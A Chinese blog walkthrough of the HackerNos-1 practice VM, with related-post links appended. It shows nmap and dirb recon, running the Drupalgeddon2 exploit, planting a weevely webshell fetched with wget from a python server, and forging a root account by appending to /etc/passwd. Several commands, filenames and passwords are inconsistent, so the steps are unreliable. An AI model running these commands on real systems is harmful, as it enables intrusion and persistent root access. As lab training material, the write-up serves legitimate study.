HackerNos-1靶场

最新推荐文章于 2023-09-06 14:46:53 发布
最新推荐文章于 2023-09-06 14:46:53 发布
阅读量483 收藏
点赞数 1
文章标签: 靶机 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/109588553
版权

HackerNos-1

靶机ip:192.168.9.41
攻击机ip(kali):192.168.9.31

1.信息收集:

nmap -sn 192.168.9.0/24
nmap -A -v 192.168.9.41

在这里插入图片描述
在这里插入图片描述

2.扫描目录:

dirb http://192.168.9.41/drupal

在这里插入图片描述

3.在github中找到关于drupal的cms漏洞溢出

找到的连接为: https://github.com/dreadlocked/Drupalgeddon2

在kali中下载克隆这个漏洞环境:

git clone https://github.com/dreadlocked/Drupalgeddon2

然后下载一个库:

gem install highline

在这里插入图片描述

4.获取一个低权限的shell

cd /dreadlocked
./dreadlocked2.rb http://192.168.9.41/drupa

在低权限的shell中返回上一级不能成功执行,证明没得到最高权限
**5.权限维持**
先写一个木马文件在kali里面

```bash
weevely generate zxc ./zxc.php

在这里插入图片描述

然后创建一个python服务:

python2 -m SimpleHTTPServer 8080

在这里插入图片描述

然后在低权限的那个shell中下载这个木马

wget http://192.168.9.41:8080/zxc.php

在浏览器中测试这个木马是否上传成功,空白页证明上传成功了
再用本机终端连接测试:

weevely  http://192.168.9.41/drupal/z1.php 123456

在这里插入图片描述

6.提权:
查看一个文件

cat alexander.txt

在这里插入图片描述

然后是base64加密,因为他有两个等于号
解密出来是brainfuck值,然后再解密

https://www.dcode.fr/brainfuck-language  //brainfuck的解码工具

在这里插入图片描述

获取用户名和密码
james :Hacker@4514
下载passwd文件

file_download passwd /root/桌面/passwd

创建一个新的密码文件

openssl passwd -1 -salt salt 123456

在这里插入图片描述

写入密码和用户名:

echo 'chao:$1$salt$638tR8bROOvPnPklDQ9Vf.:0:0::/root/:/bin/bash'>>passwd

在这里插入图片描述

如果echo不行可以直接复制

在msf5中进行
(查找模块省略,看截图)
在这里插入图片描述

所有参数配置好之后然后run 然后shell
然后python3

python3 -c 'import pty;pty.spawn("/bin/bash")'

进入之后再shell

然后成功弹出shell
在这里插入图片描述

切换用户

su chao
passwd:zxczxc

在这里插入图片描述

进入之后id
证明提权成功获取最高管理员权限

24team
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
VulnHub-Chill-Hack 1 靶场渗透实验
qq_56724121的博客
04-27 569
VulnHub-Chill-Hack 1 靶场渗透实验 一、信息收集 1、收集靶机的ip nmap来扫描存活的主机 nmap -sn 192.168.226.0/24( -v表示显示过程) 根据扫描的结果,可以继续验证目标靶机的ip 确定目标靶机地址是192.168.226.131 2、根据得到的靶机ip,继续扫描靶机相关的服务开放情况 nmap -sC -sV 192.168.226.131 -p- --min-rate=2000 -n -vv -sC –...
渗透靶场——HackMyVM:Tom
tlovejr的博客
03-28 2041
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 信息收集 扫描主机 arp-scan -l 发现了存活主机的ip地址为192.168.1.69 扫描端口 扫描靶机开放的服务端口 nmap -p- -A 192.168.1.69 发现有22,80,8080端口进行开放,正常情况下我们现在先在80端口开始突破 Web渗透 http://192.
ZVuldrill 黑客靶场 附带安装教程
01-26
平台中有10个挑战,包含的漏洞有: ·SQL注入 ·储存型和反射型XSS ·CSRF ·文件包含 ·后台弱口令 ·文件上传 ·目录遍历 ·权限跨越
TryHackerMe Cyborg靶机
z4yn:)的博客
02-05 272
Cyborg A box involving encrypted archives, source code analysis and more. ## 01 信息收集 先用nmap扫描开放端口信息,枚举端口上运行的服务 访问80端口是个apache默认页面,用dirb扫描一下网站目录 发现两个比较可疑的目录/admin和/etc 再用dirbuster扫一遍目录,得到一个压缩包archive.tar,我以为是源码之类的,打开发现不是。 现招其它线索,a...
vulnhub靶场,Os-hackNos-1
kukudeshuo的博客
07-18 541
vulnhub靶场,Os-hackNos-1 环境准备 攻击机:kali(192.168.58.130) 靶机:Os-hackNos-1(192.168.58.156) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.156 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 就是一个ubuntu系统的默认ht
CISP-PTE靶场(win+centos).zip
03-13
1. **CISP认证**: CISP,全称为"注册信息安全专业人员",是中国信息安全测评中心颁发的一种国际认证,旨在衡量和证明信息安全专业人士的技术能力和管理能力。这个靶场的设置是为了帮助考生熟悉并实践信息安全相关...
WEB渗透学习-upload-labs靶场
04-20
1. **理论结合实践**:每个关卡前,先学习相关漏洞原理,然后在靶场中实践,加深理解。 2. **工具辅助**:使用Burp Suite、Fiddler等抓包工具,分析上传过程,找到漏洞点。 3. **代码审计**:尝试阅读靶场源码,理解...
sqli-labs靶场
最新发布
05-30
1. **错误注入**:这种注入方式是通过触发服务器错误来获取数据库信息。当应用程序没有正确地过滤用户输入并将其拼接到SQL查询中时,攻击者可以构造特殊的输入,导致服务器返回关于数据库结构或数据的错误信息。 2....
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 562
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
黑客靶场之ZVuldrill 附带安装教程
12-14
黑客靶场之ZVuldrill 附带安装教程 基于本地的渗透测试环境 提高自己对网络攻防的基本认识和增加自己的动手能力。基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在windows, linux 或 Mac平台下进行设置,为了能正常使用XVMA你需要按以下几个步骤配置Apache-PHP-MYSQL环境,这里我们使用的是XAMP,你也可以自己选择喜欢的集成包。 将xvwa文件复制到你的web目录,确保目录名依旧为xvwa。 配合kali效果更佳
CHill_HACK靶机渗透测试
weixin_49340699的博客
07-23 562
CHill_HACK靶机渗透测试环境工具流程 环境 kali IP 192.168.19.131 靶机 IP 192.168.19.154 工具 netdicover nmap gobuster netcat steghide frackzip base64在线解码 流程 首先使用netdiscover对目标网段进行扫描主机发现 发现目标主机192.168.19.154 nmap对端口扫描信息收集 目标靶机开启了ssh,ftp,http 先从21端口开始收集查看ftp是否存在匿名登录,存在匿名登录,登录
信息安全pikachu靶场 暴力破解模块 hacker
yzcn
12-08 400
暴力破解漏洞测试流程 1、 确认登录接口的脆弱性 2、 对字典进行优化 技巧: 对目标站点进行注册,搞清楚站点的账号密码设置的机制 对系统后台进行爆破,优先使用admin、administrator、root这种概率比较高的账号进行测试,使用这些账号,如果返回密码错误,则可以确定账号。提高效率。 3、 工具自动化操作 基于表单的暴力破解 1、首先判断是否可使用暴力破解: 对登录页面的基本判断,该页面要求输入账号密码,登录失败时,返回账号密码不存在,进行抓包分析,可以发现传入后台进行效验的参数也只
vulnhub靶场-BoredHackerBlog: Cloud AV
qq_42947816的博客
05-10 1010
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Hacker_kid靶机打靶过程及思路
qq_52610024的博客
04-25 1686
下载利用权限利用的python进程注入脚本wgethttps//gist.githubusercontent.com/wifisecguy/1d69839fe55c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py。7.挨个读取后,在读取/home/saket/.bashrc时没有回显,使用php封装器读取,然后进行解码。,发现得到用户名和密码,在登录处登录失效,尝试使用saket作为用户名登录。...
Hacker_Kid-v1.0.1靶场
zjxxxy的博客
06-15 237
vulnhub靶场Hacker_Kid-v1.0.1攻略
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 2093
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
网安秘籍之入门必刷练习靶场
m0_59236127的博客
09-06 257
Hi,我是Hacker小白。今天来给大家推荐几个可以说是入坑必刷靶机了,没有之一。(很多高校的入坑课的第一节都是搭建 DVWA)还是简单介绍一下吧。Damn Vulnerable Web Application (DVWA),其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助 Web 开发人员更好地了解保护 Web 应用程序的过程,并帮助教师/学生在课堂环境中教授/学习 Web 应用程序安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值